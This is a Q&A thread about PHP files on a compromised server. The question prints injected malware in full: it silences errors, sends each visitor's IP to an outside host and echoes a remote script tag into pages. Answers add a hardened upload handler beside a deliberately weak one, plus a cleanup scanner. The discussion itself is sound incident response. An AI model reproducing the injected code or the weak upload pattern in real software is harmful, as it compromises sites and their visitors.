
Last week we had a problem on our server where code was injected into PHP files. I was wondering what the cause of this could have been. The code snippet that has been injected into our files looked something like this.

#be7339#
if (empty($qjqb))
{
    // Run silently: suppress any errors the injected code might raise.
    error_reporting(0);
    @ini_set('display_errors', 0);
    // Fetch a URL with whatever transport the host permits: cURL, then
    // file_get_contents (needs allow_url_fopen), then fopen, then raw sockets.
    if (!function_exists('__url_get_contents'))
    {
        function __url_get_contents($remote_url, $timeout)
        {
            if (function_exists('curl_exec'))
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $remote_url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
                $_url_get_contents_data = curl_exec($ch);
                curl_close($ch);
            }
            elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
            {
                $ctx = @stream_context_create(array('http' => array('timeout' => $timeout,)));
                $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
            }
            elseif (function_exists('fopen') && function_exists('stream_get_contents'))
            {
                $handle = @fopen($remote_url, "r");
                $_url_get_contents_data = @stream_get_contents($handle);
            }
            else
            {
                $_url_get_contents_data = __file_get_url_contents($remote_url);
            }
            return $_url_get_contents_data;
        }
    }

    // Fallback HTTP/1.0 client over fsockopen. Note that $timeout is never
    // defined inside this function in the injected sample; it is only a
    // parameter of __url_get_contents above.
    if (!function_exists('__file_get_url_contents'))
    {
        function __file_get_url_contents($remote_url)
        {
            if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches))
            {
                $protocol = strtolower($matches[1]);
                $host = $matches[2];
                $path = $matches[3];
            }
            else
            {
                // Bad remote_url-format
                return FALSE;
            }

            if ($protocol == "http")
            {
                $socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
            }
            else
            {
                // Bad protocol
                return FALSE;
            }

            if (!$socket)
            {
                // Error creating socket
                return FALSE;
            }

            $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
            $len_written = @fwrite($socket, $request);
            if ($len_written === FALSE || $len_written != strlen($request))
            {
                // Error sending request
                return FALSE;
            }
            $response = "";
            while (!@feof($socket) &&
                   ($buf = @fread($socket, 4096)) !== FALSE) {
                $response .= $buf;
            }
            if ($buf === FALSE)
            {
                // Error reading response
                return FALSE;
            }
            // Drop the HTTP headers and return only the body
            $end_of_header = strpos($response, "\r\n\r\n");
            return substr($response, $end_of_header + 4);
        }
    }

    // Payload: send the visitor's IP to the attacker's server and, if the
    // reply is a URL, echo a <script> tag pointing at it into the page output.
    if (empty($__var_to_echo) && empty($remote_domain))
    {
        $_ip = $_SERVER['REMOTE_ADDR'];
        $qjqb = "http://pleasedestroythis.net/L3xmqGtN.php";
        $qjqb = __url_get_contents($qjqb."?a=$_ip", 1);
        if (strpos($qjqb, 'http://') === 0)
        {
            $__var_to_echo = '<script type="text/javascript" src="' . $qjqb . '?id=13028308"></script>';
            echo $__var_to_echo;
        }
    }
}

I would like to ask how this could have happened, and how to prevent it in the future.

Thanks in advance.

1 Comment

Better suited to Server Fault or Information Security, but too broad even for there. Buy a book on computer security and/or hire a security professional? Commented Apr 23, 2014 at 14:54

4 Answers


Script (PHP) code injection usually means that someone has gotten hold of the password(s) to your hosting account. At the very minimum scan your PCs for spyware and viruses, and then change your passwords. Use SSL when connecting to your hosting account control panel, if possible. Be careful about using FTP, as it sends passwords in the clear. See if your host supports a more secure file transfer method.


1 Comment

This has also been part of our discovery: there was an unattended PC in the building which had a lot of viruses and connection information in the FileZilla history. Thank you for your contribution.

The most common way this happens is that you probably have a script that allows file uploads. Then, if the script does not validate what file is uploaded, a malicious user could upload a PHP file.

If your upload folder allows parsing of PHP files, the user could run that PHP file in the browser. It could be some sort of file explorer, which will then show the user all the files on your server. Now, if any files have the right permissions, the user could easily edit the file to include the extra code you are seeing.

3 Comments

To avoid this, you should never store any user-uploaded file in your webroot, but store it outside and always access it through a custom handler. Regarding the access rights check, this is also a better practice. It's important to note there could be a lot of other valid explanations... tracking a security hole is always very complicated.
Thank you for your reply. On most of the sites there are no file uploads involved; there is a login form, but all input is escaped and sanitized. I think I'm looking at an FTP password which has been leaked.
Yes, it could be FTP then. If you have FTP access log files, take a look there for anything unusual. Also check the last modified date, the owner/group settings and the permissions of the file. These things often give you clues as to how the file was accessed. If the permissions only allow the FTP user, then it must have been via FTP. Best of luck.
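The pattern this answer describes (an upload handler that keeps the client's filename and drops it into a directory the web server will execute PHP from) beside a hardened handler, as an added example that is not part of the question or of any answer on this page. The upload directory `UPLOAD_DIR` (assumed to sit outside the document root), the size limit, the allow-list and the field names are assumptions for illustration:

```php
<?php
// Added example, not code from the question or from any answer on this page.
// The weak handler is the pattern the answer describes; the hardened one is
// what to replace it with. UPLOAD_DIR (outside the document root), MAX_BYTES,
// the ALLOWED map and the request field names are assumptions.

// WEAK: trusts the client's filename, so "shell.php" lands under the web root
// where Apache will execute it. Shown only as the anti-pattern.
function save_upload_weak(array $file): string
{
    $dest = __DIR__ . '/uploads/' . basename($file['name']);
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

const UPLOAD_DIR = '/var/www/private/uploads'; // assumed: NOT under DocumentRoot
const MAX_BYTES  = 5 * 1024 * 1024;
const ALLOWED    = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'application/pdf' => 'pdf'];

// HARDENED: sniff the real content type, choose our own name and extension,
// store outside the web root, and keep the file non-executable.
function save_upload_hardened(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . ($file['error'] ?? 'missing'));
    }
    if ($file['size'] > MAX_BYTES || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload rejected');
    }
    // $file['type'] is sent by the client and is attacker-controlled; sniff instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException("type not allowed: $mime");
    }
    $id   = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime]; // never the user's name
    $dest = UPLOAD_DIR . '/' . $id;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($dest, 0640);
    return $id; // keep this id in the database; the path never reaches the client
}

// Files are handed back through this handler, never by a direct URL.
function serve_upload(string $id): void
{
    $path = UPLOAD_DIR . '/' . $id;
    if (!preg_match('/^[a-f0-9]{32}\.(png|jpg|pdf)$/', $id) || !is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . (new finfo(FILEINFO_MIME_TYPE))->file($path));
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . $id . '"');
    readfile($path);
}

// Typical wiring (assumed): POST with a "document" field stores; GET ?id=... serves.
if (PHP_SAPI !== 'cli') {
    if (isset($_FILES['document'])) {
        echo save_upload_hardened($_FILES['document']);
    } elseif (isset($_GET['id'])) {
        serve_upload((string) $_GET['id']);
    }
}
```

The type sniff is a filter, not the defence: a valid PNG or PDF can still carry `<?php ... ?>` in a comment chunk, which is exactly why the file must live where no handler will ever run it. If uploads have to stay under the web root for some reason, turn PHP off for that directory as well (`php_flag engine off` for mod_php, or leave the directory out of the PHP-FPM handler rule) and verify it by requesting a harmless `.php` file there and confirming it comes back as plain text rather than being executed.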

Usually it's because somebody else got access to your FTP or you allow uploading PHP files.

You should look into other files, because there could be other code that keeps adding those lines to your code (just a guess because of "#be7339#" at the beginning).

1 Comment

There have been a lot of files infected, and they all started with code like that. That is why I'm looking for the cause and a solution to prevent this from happening again. So far I've reset all available FTP passwords and cleaned the files of the malicious code. Thank you for your thoughts on this problem.
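A scanner for the situation this answer and the question describe: it walks a web root looking for every PHP file that carries the injected block from the question (recognised by the `#be7339#` marker and the brace-delimited `if (empty($qjqb)) { ... }` body that follows it), reports the modification time, owner and mode that the comments above suggest checking, and with `--clean` strips the block after saving a `.bak` copy. This is an added example, not code from the question or from any answer; the script name, the flag and the paths are assumptions:

```php
<?php
// Added example, not from the question or any answer on this page. Finds the
// injected block by its "#be7339#" marker, reports forensic details per file,
// and optionally removes the block. Paths and the --clean flag are assumptions.

const INJECT_MARKER = '#be7339#';

// Locate the injected block: returns [start, end) byte offsets, or null if the
// marker is absent or the braces do not balance. Braces are counted from the
// first "{" after the marker; quoted strings and "//" or "#" line comments are
// skipped so braces or quotes inside them are not miscounted.
function find_injected_block(string $src): ?array
{
    $start = strpos($src, INJECT_MARKER);
    if ($start === false) {
        return null;
    }
    $open = strpos($src, '{', $start);
    if ($open === false) {
        return null;
    }
    $len   = strlen($src);
    $depth = 0;
    for ($i = $open; $i < $len; $i++) {
        $c = $src[$i];
        if ($c === '"' || $c === "'") {
            for ($i++; $i < $len && $src[$i] !== $c; $i++) { // skip the string
                if ($src[$i] === '\\') {
                    $i++;                                    // honour escapes
                }
            }
        } elseif (($c === '/' && $i + 1 < $len && $src[$i + 1] === '/') || $c === '#') {
            $nl = strpos($src, "\n", $i);                     // skip the comment
            if ($nl === false) {
                return null;
            }
            $i = $nl;
        } elseif ($c === '{') {
            $depth++;
        } elseif ($c === '}' && --$depth === 0) {
            $end = $i + 1;
            if ($end < $len && $src[$end] === "\n") {
                $end++;                                       // eat the line break
            }
            return [$start, $end];
        }
    }
    return null;
}

// Walk $root, report every .php file carrying the block and, when $clean is
// true, rewrite it without the block (keeping the original as <file>.bak).
function scan_tree(string $root, bool $clean = false): array
{
    $hits  = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $path = $file->getPathname();
        $src  = file_get_contents($path);
        if ($src === false || ($span = find_injected_block($src)) === null) {
            continue;
        }
        $owner = $file->getOwner();
        if (function_exists('posix_getpwuid') && ($pw = posix_getpwuid($owner))) {
            $owner = $pw['name'];
        }
        $hits[] = [
            'path'  => $path,
            'mtime' => date('c', $file->getMTime()),
            'owner' => $owner,
            'mode'  => substr(sprintf('%o', $file->getPerms()), -4),
        ];
        if ($clean) {
            [$s, $e] = $span;
            file_put_contents($path . '.bak', $src);
            file_put_contents($path, substr($src, 0, $s) . substr($src, $e));
        }
    }
    return $hits;
}

// Self-check on a constructed file so the example runs without a web root.
function self_check(): bool
{
    $injected = "#be7339#\nif (empty(\$qjqb))\n{\n    error_reporting(0);\n"
              . "    \$s = \"a { b } c\"; // don't count these\n"
              . "    if (strpos(\$qjqb, 'http://') === 0) { echo '<script src=\"' . \$qjqb . '\"></script>'; }\n"
              . "}\n";
    $legit = "<?php\necho 'legitimate page';\n";
    $file  = "<?php\n" . $injected . "echo 'legitimate page';\n";
    $span  = find_injected_block($file);
    if ($span === null) {
        return false;
    }
    [$s, $e] = $span;
    return substr($file, 0, $s) . substr($file, $e) === $legit
        && find_injected_block($legit) === null;
}

if (PHP_SAPI === 'cli') {
    if (!self_check()) {
        fwrite(STDERR, "self-check failed\n");
        exit(1);
    }
    if (!isset($argv[1])) {
        echo "self-check ok; usage: php scan.php /path/to/webroot [--clean]\n";
        exit(0);
    }
    $clean = in_array('--clean', $argv, true);
    foreach (scan_tree($argv[1], $clean) as $h) {
        printf("%s  mtime=%s owner=%s mode=%s%s\n", $h['path'], $h['mtime'],
            $h['owner'], $h['mode'], $clean ? '  [cleaned]' : '');
    }
}
```

Run it once without `--clean`, line the reported mtimes up against the FTP access log for the same window, and only then clean. The scanner only recognises this one marker; a dropper that re-injects the block will not carry it, so also list everything changed in that window (for example `find /var/www -name '*.php' -newermt '2014-04-20'`) and read anything you do not recognise.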

What is the Apache version on your server? This problem can come from using an outdated version.

Look at this link about security breaches in old versions of Apache:

http://httpd.apache.org/security/vulnerabilities_20.html
